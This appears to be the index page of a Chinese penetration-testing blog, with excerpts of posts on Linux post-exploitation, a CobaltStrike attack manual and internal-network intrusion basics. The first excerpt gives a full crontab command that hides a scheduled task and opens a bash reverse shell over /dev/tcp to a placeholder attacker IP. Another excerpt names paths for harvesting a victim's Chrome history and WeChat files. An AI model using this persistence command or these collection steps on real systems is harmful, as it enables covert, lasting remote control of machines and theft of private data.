Post-Exploit #内网渗透 #post-exploit

Tips in hide schedule tasks in Linux

(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/Attack-IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")

Administrator 发布于 2025-01-19

内网渗透 #ActiveDirectory #CobaltStrike

CobaltStrike攻击手册

权限提升和信息收集初步侦查 1.1搜索公司收入找到公司网站在Google上搜索：公司名称 + 收入 (mycorporation.com + revenue) (“mycorporation.com” “revenue”) 检查超过1个网站，如果可能的话 (owler, manta, zoom

Administrator 发布于 2024-11-11

内网渗透 #内网渗透 #信息收集 #痕迹清理 #权限提升 #横向移动 #隧道搭建

内网渗透基础

前言本文主要对一些有用常用的但不太基础的内容作以记录信息收集 Chrome浏览器信息历史记录 %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History 微信文件枚举微信账户接受的文件 dir /s /b C:\Us

Administrator 发布于 2024-11-11

菜单

Tips in hide schedule tasks in Linux

CobaltStrike攻击手册

内网渗透基础

人工智能（AI）模型的安全挑战：多方面的风险剖析

Tips in hide schedule tasks in Linux

NTLM Login RDP

云原生安全攻防指南

Redis unauthorized post exploit

Cloud Hacking-(1)

使用汇编语言实现xor加密

Kubernetes 环境安全与权限检查

Mythic C2搭建（apollo&&sliver）

CobaltStrike攻击手册